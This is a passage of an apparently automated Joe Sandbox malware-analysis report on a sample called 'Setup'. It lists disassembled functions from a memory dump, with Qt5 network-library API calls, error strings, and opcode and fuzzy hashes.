                                                                                                                                                              • ?connect@QObject@@SA?AVConnection@QMetaObject@@PEBV1@PEBD01W4ConnectionType@Qt@@@Z.QT5CORE ref: 00007FFBA1989530
                                                                                                                                                              • ??1Connection@QMetaObject@@QEAA@XZ.QT5CORE ref: 00007FFBA198953B
                                                                                                                                                              • ?connect@QObject@@SA?AVConnection@QMetaObject@@PEBV1@PEBD01W4ConnectionType@Qt@@@Z.QT5CORE ref: 00007FFBA198956B
                                                                                                                                                              • ??1Connection@QMetaObject@@QEAA@XZ.QT5CORE ref: 00007FFBA1989576
                                                                                                                                                              • ?reserve@QRingBuffer@@QEAAPEAD_J@Z.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00007FFBA19895B4
                                                                                                                                                              • ?read@QIODevice@@QEAA_JPEAD_J@Z.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00007FFBA19895C7
                                                                                                                                                              • ?chop@QRingBuffer@@QEAAX_J@Z.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00007FFBA19895E5
                                                                                                                                                                • Part of subcall function 00007FFBA1A55CBC: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FFBA19730E8), ref: 00007FFBA1A55CD6
                                                                                                                                                              • ?chop@QRingBuffer@@QEAAX_J@Z.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00007FFBA1989601
                                                                                                                                                              • ?disconnect@QObject@@SA_NPEBV1@PEBD01@Z.QT5CORE ref: 00007FFBA1989666
                                                                                                                                                              • ?disconnect@QObject@@SA_NPEBV1@PEBD01@Z.QT5CORE ref: 00007FFBA1989684
                                                                                                                                                              • ??0QGenericReturnArgument@@QEAA@PEBDPEAX@Z.QT5CORE ref: 00007FFBA1989693
                                                                                                                                                              • ??0QGenericReturnArgument@@QEAA@PEBDPEAX@Z.QT5CORE ref: 00007FFBA19896AA
                                                                                                                                                              • ??0QGenericReturnArgument@@QEAA@PEBDPEAX@Z.QT5CORE ref: 00007FFBA19896C0
                                                                                                                                                              • ??0QGenericReturnArgument@@QEAA@PEBDPEAX@Z.QT5CORE ref: 00007FFBA19896D6
                                                                                                                                                              • ??0QGenericReturnArgument@@QEAA@PEBDPEAX@Z.QT5CORE ref: 00007FFBA19896EC
                                                                                                                                                              • ??0QGenericReturnArgument@@QEAA@PEBDPEAX@Z.QT5CORE ref: 00007FFBA1989702
                                                                                                                                                              • ??0QGenericReturnArgument@@QEAA@PEBDPEAX@Z.QT5CORE ref: 00007FFBA1989718
                                                                                                                                                              • ??0QGenericReturnArgument@@QEAA@PEBDPEAX@Z.QT5CORE ref: 00007FFBA1989731
                                                                                                                                                              • ??0QGenericReturnArgument@@QEAA@PEBDPEAX@Z.QT5CORE ref: 00007FFBA198974A
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Argument@@GenericReturn$Object@@$Connection@Meta$Buffer@@Ring$?chop@?connect@?disconnect@ConnectionD01@Qt@@@Type@$?read@?reserve@?sharedArrayData@@Device@@Null@Xlength_error@std@@malloc
                                                                                                                                                              • String ID: 1_q_bufferOutgoingData()$1_q_bufferOutgoingDataFinished()$2readChannelFinished()$2readyRead()$_q_startOperation$vector<T> too long
                                                                                                                                                              • API String ID: 141468012-2728861451
                                                                                                                                                              • Opcode ID: 675848130f4aab9260527e1ea579a95f5f59b107125896fb7ec4ba411dda588f
                                                                                                                                                              • Instruction ID: b9c0c85644b19e3fa8278184b0388700dc409c84ab9a1f1a7d9f86717aa39525
                                                                                                                                                              • Opcode Fuzzy Hash: 675848130f4aab9260527e1ea579a95f5f59b107125896fb7ec4ba411dda588f
                                                                                                                                                              • Instruction Fuzzy Hash: 9FC16C62A09F95C6E7528F39E8042ED73B1FF98758F449232DE5D16A25EF38E185CB00
                                                                                                                                                              Function 00007FFBA19D3E30 Relevance: 49.2, APIs: 23, Strings: 5, Instructions: 212COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Array@@Byte$Generic$Argument@@Return$?end@Data@@ListObject@@$?invoke?qstrcmp@@?startsArgument@@333333333@ConnectionMetaMethod@Qt@@Type@V0@@With@
                                                                                                                                                              • String ID: Accept-Ranges$Range$_q_startOperation$bytes=$none
                                                                                                                                                              • API String ID: 3994552064-680470801
                                                                                                                                                              • Opcode ID: 6e59e0eef43c0f4a1f7bb90b31307f284d9609d2ff4e968d8c81966271c4872c
                                                                                                                                                              • Instruction ID: 12ca2198aa0a934cadb9df614a7162f98180e0233d7b327de7175eada481c581
                                                                                                                                                              • Opcode Fuzzy Hash: 6e59e0eef43c0f4a1f7bb90b31307f284d9609d2ff4e968d8c81966271c4872c
                                                                                                                                                              • Instruction Fuzzy Hash: 67B16F62A09A9599F7628F38D8447EC7371FF5831CF809232DE5D16565FF38A29ACB00
                                                                                                                                                              Function 00007FFBA19FF1A0 Relevance: 43.9, APIs: 22, Strings: 3, Instructions: 170windowcomCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • CoCreateInstance.OLE32(?,?,?,?,?,?,00000000,00000000,00000000,00007FFBA19FF569), ref: 00007FFBA19FF200
                                                                                                                                                              • ?isWarningEnabled@QLoggingCategory@@QEBA_NXZ.QT5CORE(?,?,?,?,?,?,00000000,00000000,00000000,00007FFBA19FF569), ref: 00007FFBA19FF218
                                                                                                                                                              • ??0QMessageLogger@@QEAA@PEBDH00@Z.QT5CORE(?,?,?,?,?,?,00000000,00000000,00000000,00007FFBA19FF569), ref: 00007FFBA19FF241
                                                                                                                                                              • ?warning@QMessageLogger@@QEBA?AVQDebug@@XZ.QT5CORE(?,?,?,?,?,?,00000000,00000000,00000000,00007FFBA19FF569), ref: 00007FFBA19FF252
                                                                                                                                                              • ??6QDebug@@QEAAAEAV0@PEBD@Z.QT5CORE(?,?,?,?,?,?,00000000,00000000,00000000,00007FFBA19FF569), ref: 00007FFBA19FF262
                                                                                                                                                              • ??6QDebug@@QEAAAEAV0@AEBVQString@@@Z.QT5CORE(?,?,?,?,?,?,00000000,00000000,00000000,00007FFBA19FF569), ref: 00007FFBA19FF280
                                                                                                                                                              • ??1QString@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,00000000,00000000,00000000,00007FFBA19FF569), ref: 00007FFBA19FF28E
                                                                                                                                                              • ??1QDebug@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,00000000,00000000,00000000,00007FFBA19FF569), ref: 00007FFBA19FF29C
                                                                                                                                                              • ??0QMessageLogger@@QEAA@PEBDH00@Z.QT5CORE(?,?,?,?,?,?,00000000,00000000,00000000,00007FFBA19FF569), ref: 00007FFBA19FF2EB
                                                                                                                                                              • ?warning@QMessageLogger@@QEBA?AVQDebug@@XZ.QT5CORE(?,?,?,?,?,?,00000000,00000000,00000000,00007FFBA19FF569), ref: 00007FFBA19FF2FC
                                                                                                                                                              • ??6QDebug@@QEAAAEAV0@AEBVQString@@@Z.QT5CORE(?,?,?,?,?,?,00000000,00000000,00000000,00007FFBA19FF569), ref: 00007FFBA19FF32A
                                                                                                                                                              • ??1QString@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,00000000,00000000,00000000,00007FFBA19FF569), ref: 00007FFBA19FF338
                                                                                                                                                              • ??1QDebug@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,00000000,00000000,00000000,00007FFBA19FF569), ref: 00007FFBA19FF346
                                                                                                                                                              • ??6QDebug@@QEAAAEAV0@PEBD@Z.QT5CORE(?,?,?,?,?,?,00000000,00000000,00000000,00007FFBA19FF569), ref: 00007FFBA19FF30C
                                                                                                                                                                • Part of subcall function 00007FFBA19FFB00: FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,00007FFBA19FF413), ref: 00007FFBA19FFB4B
                                                                                                                                                                • Part of subcall function 00007FFBA19FFB00: ?fromWCharArray@QString@@SA?AV1@PEB_WH@Z.QT5CORE(?,?,?,?,?,?,?,?,?,?,00000000,00007FFBA19FF413), ref: 00007FFBA19FFC07
                                                                                                                                                                • Part of subcall function 00007FFBA19FFB00: LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,00007FFBA19FF413), ref: 00007FFBA19FFC2C
                                                                                                                                                              • ?isWarningEnabled@QLoggingCategory@@QEBA_NXZ.QT5CORE(?,?,?,?,?,?,00000000,00000000,00000000,00007FFBA19FF569), ref: 00007FFBA19FF2C6
                                                                                                                                                                • Part of subcall function 00007FFBA1A00560: ??0QLoggingCategory@@QEAA@PEBD@Z.QT5CORE(?,?,00000000,00007FFBA19FF3B2,?,?,?,?,?,?,00000000,00000000,00000000,00007FFBA19FF569), ref: 00007FFBA1A005BC
                                                                                                                                                                • Part of subcall function 00007FFBA1A00560: _Init_thread_footer.LIBCMT ref: 00007FFBA1A005D5
                                                                                                                                                              • ?isWarningEnabled@QLoggingCategory@@QEBA_NXZ.QT5CORE(?,?,?,?,?,?,00000000,00000000,00000000,00007FFBA19FF569), ref: 00007FFBA19FF3B5
                                                                                                                                                              • ??0QMessageLogger@@QEAA@PEBDH00@Z.QT5CORE(?,?,?,?,?,?,00000000,00000000,00000000,00007FFBA19FF569), ref: 00007FFBA19FF3DA
                                                                                                                                                              • ?warning@QMessageLogger@@QEBA?AVQDebug@@XZ.QT5CORE(?,?,?,?,?,?,00000000,00000000,00000000,00007FFBA19FF569), ref: 00007FFBA19FF3EB
                                                                                                                                                              • ??6QDebug@@QEAAAEAV0@PEBD@Z.QT5CORE(?,?,?,?,?,?,00000000,00000000,00000000,00007FFBA19FF569), ref: 00007FFBA19FF3FB
                                                                                                                                                              • ??6QDebug@@QEAAAEAV0@AEBVQString@@@Z.QT5CORE(?,?,?,?,?,?,00000000,00000000,00000000,00007FFBA19FF569), ref: 00007FFBA19FF419
                                                                                                                                                              • ??1QString@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,00000000,00000000,00000000,00007FFBA19FF569), ref: 00007FFBA19FF427
                                                                                                                                                              • ??1QDebug@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,00000000,00000000,00000000,00007FFBA19FF569), ref: 00007FFBA19FF435
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Debug@@$Message$Logger@@$Category@@LoggingString@@$?warning@Enabled@H00@String@@@Warning$?fromArray@CharCreateFormatFreeInit_thread_footerInstanceLocal
                                                                                                                                                              • String ID: Could not get a NetworkListManager instance:$Could not get connectivity:$Failed to get connection point for network list manager events:
                                                                                                                                                              • API String ID: 139455383-40377270
                                                                                                                                                              • Opcode ID: 6d6ab1cbb68bdc8705f4a1d76a6027a9e089e9b7bb47c65d14fe61469ece1ba2
                                                                                                                                                              • Instruction ID: 6480d5318e07cf3f17b13ce9082e7e84b8f142c0c4fbbc3350ade504c6c7343f
                                                                                                                                                              • Opcode Fuzzy Hash: 6d6ab1cbb68bdc8705f4a1d76a6027a9e089e9b7bb47c65d14fe61469ece1ba2
                                                                                                                                                              • Instruction Fuzzy Hash: D67153B660AA4291EB92DB75E8542AA7361FF84F94F408032CE9E47764FF3CD549CB00
                                                                                                                                                              Function 00007FFBA198BA30 Relevance: 37.0, APIs: 20, Strings: 1, Instructions: 277COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Generic$Argument@@Return$Array@@ByteData@@$Object@@$?dispose@?free_helper@Data@1@@HashListNode@1@@$?invoke?setArgument@@333333333@ConnectionMetaMethod@Parent@Qt@@Type@V1@@
                                                                                                                                                              • String ID: _q_startOperation
                                                                                                                                                              • API String ID: 1837584542-2504287645
                                                                                                                                                              • Opcode ID: 604c04cfbe82ff567e57ba862b7412ba1b7bbf722b96ab0e40b3cf9b7f1f7f25
                                                                                                                                                              • Instruction ID: d7114f4e1ffeca70a9776c14bcded3bc2f4f8e8927acafbd7f4970d204e70679
                                                                                                                                                              • Opcode Fuzzy Hash: 604c04cfbe82ff567e57ba862b7412ba1b7bbf722b96ab0e40b3cf9b7f1f7f25
                                                                                                                                                              • Instruction Fuzzy Hash: D3D15B62A09B9586E7668F38D9443ED73B1FF58718F498232CE4E57614EF38E196CB00
                                                                                                                                                              Function 00007FFBA1A00BD0 Relevance: 35.1, APIs: 17, Strings: 3, Instructions: 130windowCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • ?isWarningEnabled@QLoggingCategory@@QEBA_NXZ.QT5CORE(?,?,?,?,?,?,?,?,?,00007FFBA1A00F48), ref: 00007FFBA1A00BEE
                                                                                                                                                              • ??0QMessageLogger@@QEAA@PEBDH00@Z.QT5CORE(?,?,?,?,?,?,?,?,?,00007FFBA1A00F48), ref: 00007FFBA1A00C17
                                                                                                                                                              • ?warning@QMessageLogger@@QEBAXPEBDZZ.QT5CORE(?,?,?,?,?,?,?,?,?,00007FFBA1A00F48), ref: 00007FFBA1A00C27
                                                                                                                                                              • ?isWarningEnabled@QLoggingCategory@@QEBA_NXZ.QT5CORE(?,?,?,?,?,?,?,?,?,00007FFBA1A00F48), ref: 00007FFBA1A00C59
                                                                                                                                                              • ??0QMessageLogger@@QEAA@PEBDH00@Z.QT5CORE(?,?,?,?,?,?,?,?,?,00007FFBA1A00F48), ref: 00007FFBA1A00C7E
                                                                                                                                                              • ?warning@QMessageLogger@@QEBA?AVQDebug@@XZ.QT5CORE(?,?,?,?,?,?,?,?,?,00007FFBA1A00F48), ref: 00007FFBA1A00C8C
                                                                                                                                                              • ??6QDebug@@QEAAAEAV0@PEBD@Z.QT5CORE(?,?,?,?,?,?,?,?,?,00007FFBA1A00F48), ref: 00007FFBA1A00C9C
                                                                                                                                                              • ??6QDebug@@QEAAAEAV0@AEBVQString@@@Z.QT5CORE(?,?,?,?,?,?,?,?,?,00007FFBA1A00F48), ref: 00007FFBA1A00CB7
                                                                                                                                                              • ??1QString@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,?,?,00007FFBA1A00F48), ref: 00007FFBA1A00CC2
                                                                                                                                                              • ??1QDebug@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,?,?,00007FFBA1A00F48), ref: 00007FFBA1A00CCD
                                                                                                                                                              • ?isWarningEnabled@QLoggingCategory@@QEBA_NXZ.QT5CORE(?,?,?,?,?,?,?,?,?,00007FFBA1A00F48), ref: 00007FFBA1A00D01
                                                                                                                                                              • ??0QMessageLogger@@QEAA@PEBDH00@Z.QT5CORE(?,?,?,?,?,?,?,?,?,00007FFBA1A00F48), ref: 00007FFBA1A00D2A
                                                                                                                                                              • ?warning@QMessageLogger@@QEBA?AVQDebug@@XZ.QT5CORE(?,?,?,?,?,?,?,?,?,00007FFBA1A00F48), ref: 00007FFBA1A00D38
                                                                                                                                                              • ??6QDebug@@QEAAAEAV0@PEBD@Z.QT5CORE(?,?,?,?,?,?,?,?,?,00007FFBA1A00F48), ref: 00007FFBA1A00D48
                                                                                                                                                              • ??6QDebug@@QEAAAEAV0@AEBVQString@@@Z.QT5CORE(?,?,?,?,?,?,?,?,?,00007FFBA1A00F48), ref: 00007FFBA1A00D63
                                                                                                                                                              • ??1QString@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,?,?,00007FFBA1A00F48), ref: 00007FFBA1A00D6E
                                                                                                                                                              • ??1QDebug@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,?,?,00007FFBA1A00F48), ref: 00007FFBA1A00D79
                                                                                                                                                                • Part of subcall function 00007FFBA1A00560: ??0QLoggingCategory@@QEAA@PEBD@Z.QT5CORE(?,?,00000000,00007FFBA19FF3B2,?,?,?,?,?,?,00000000,00000000,00000000,00007FFBA19FF569), ref: 00007FFBA1A005BC
                                                                                                                                                                • Part of subcall function 00007FFBA1A00560: _Init_thread_footer.LIBCMT ref: 00007FFBA1A005D5
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Debug@@$Logger@@Message$Category@@Logging$?warning@Enabled@H00@Warning$String@@String@@@$Init_thread_footer
                                                                                                                                                              • String ID: Could not get connectivity:$Failed to subscribe to network connectivity events:$Initialization failed, can't start!
                                                                                                                                                              • API String ID: 1023853659-3975294137
                                                                                                                                                              • Opcode ID: 10481af48e2613c5627679e4dda5f23b61c5d7f0503cd4bf12592ee421f05370
                                                                                                                                                              • Instruction ID: 040ba80fe800539e07f94b25771df6925008c762d59befdc5464478f2b5d7d31
                                                                                                                                                              • Opcode Fuzzy Hash: 10481af48e2613c5627679e4dda5f23b61c5d7f0503cd4bf12592ee421f05370
                                                                                                                                                              • Instruction Fuzzy Hash: DB514DB6B0AA0292EB82DB35E4541AA73A1FF84B94F445132DE5E47765EE3CE449CF00
                                                                                                                                                              Function 00007FFBA19E3C90 Relevance: 31.7, APIs: 17, Strings: 1, Instructions: 229COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Data@@$List$Hash$?allocate?begin@?end@?lock@?willArgument@@Empty@GenericGrow@Mutex@@Node@Return
                                                                                                                                                              • String ID: requestUpdate
                                                                                                                                                              • API String ID: 1835494060-1218863351
                                                                                                                                                              • Opcode ID: 30cee7b9681ea7c7a230f35a885095369268bc9ddbc8d5a7a3f7d741ac6df515
                                                                                                                                                              • Instruction ID: 3c38650159c1633d55f22e95e09dd90e1bbbacde3239f8cec0d05d7159bdb6f5
                                                                                                                                                              • Opcode Fuzzy Hash: 30cee7b9681ea7c7a230f35a885095369268bc9ddbc8d5a7a3f7d741ac6df515
                                                                                                                                                              • Instruction Fuzzy Hash: B9B15F22A09B95C6E752CF39D8442ED77B1FF98748F859222DE4D17654EF38E285CB00
                                                                                                                                                              Function 00007FFBA19D8D70 Relevance: 31.6, APIs: 14, Strings: 4, Instructions: 102windowCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Logger@@Message$Debug@@$?debug@$?critical@V0@_
                                                                                                                                                              • String ID: bytesDownloaded$QNetworkReplyImpl: backend error: caching was enabled after some bytes had been written$QNetworkReplyImpl: setCachingEnabled(true) called after setCachingEnabled(false)$setCachingEnabled:
                                                                                                                                                              • API String ID: 2277586335-4053102236
                                                                                                                                                              • Opcode ID: 79aa523c767ee3c5d69f9bebd8544031ce00204581f9e43c3e375d5693950992
                                                                                                                                                              • Instruction ID: 480319db7086c733f7728af0531f4074df90dc357487c54e8aeef513e80dd929
                                                                                                                                                              • Opcode Fuzzy Hash: 79aa523c767ee3c5d69f9bebd8544031ce00204581f9e43c3e375d5693950992
                                                                                                                                                              • Instruction Fuzzy Hash: 83418672A1DA5282EB92DB35F4542A973A1FF94B98F844132DE5E07A65EF3CD049CF00
                                                                                                                                                              Function 00007FFBA197A960 Relevance: 26.4, APIs: 13, Strings: 2, Instructions: 130COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Generic$Argument@@Return$Object@@String$?invokeArgument@@444444444@ConnectionDuplicates@List@@@List_removeMetaMethod@Private@@Qt@@Type@
                                                                                                                                                              • String ID: QStringList$supportedSchemesImplementation
                                                                                                                                                              • API String ID: 3884633335-52536607
                                                                                                                                                              • Opcode ID: 3855794472fc38f05349832be76a1ae9e98935830c002852593a07141c456243
                                                                                                                                                              • Instruction ID: a05c09ac972ff16b71ab6894c6365d1474735fba2a8c29cf0b4862914940630a
                                                                                                                                                              • Opcode Fuzzy Hash: 3855794472fc38f05349832be76a1ae9e98935830c002852593a07141c456243
                                                                                                                                                              • Instruction Fuzzy Hash: 5F714B26618EC4D5F7029F3CD8092E973B1FF98359F859222DF8D06625EF39964ACB00
                                                                                                                                                              Function 00007FFBA19E8150 Relevance: 25.6, APIs: 17, Instructions: 80timeCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 00007FFBA1A55CBC: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FFBA19730E8), ref: 00007FFBA1A55CD6
                                                                                                                                                              • ??0QString@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,00007FFBA19EC10A,?,?,00000001,00007FFBA1975B43), ref: 00007FFBA19E817F
                                                                                                                                                              • ??0QString@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,00007FFBA19EC10A,?,?,00000001,00007FFBA1975B43), ref: 00007FFBA19E8189
                                                                                                                                                              • ??0QString@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,00007FFBA19EC10A,?,?,00000001,00007FFBA1975B43), ref: 00007FFBA19E8193
                                                                                                                                                              • ??0QString@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,00007FFBA19EC10A,?,?,00000001,00007FFBA1975B43), ref: 00007FFBA19E81AD
                                                                                                                                                              • ??0QString@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,00007FFBA19EC10A,?,?,00000001,00007FFBA1975B43), ref: 00007FFBA19E81B7
                                                                                                                                                              • ??0QString@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,00007FFBA19EC10A,?,?,00000001,00007FFBA1975B43), ref: 00007FFBA19E81CC
                                                                                                                                                              • ??0QString@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,00007FFBA19EC10A,?,?,00000001,00007FFBA1975B43), ref: 00007FFBA19E81D9
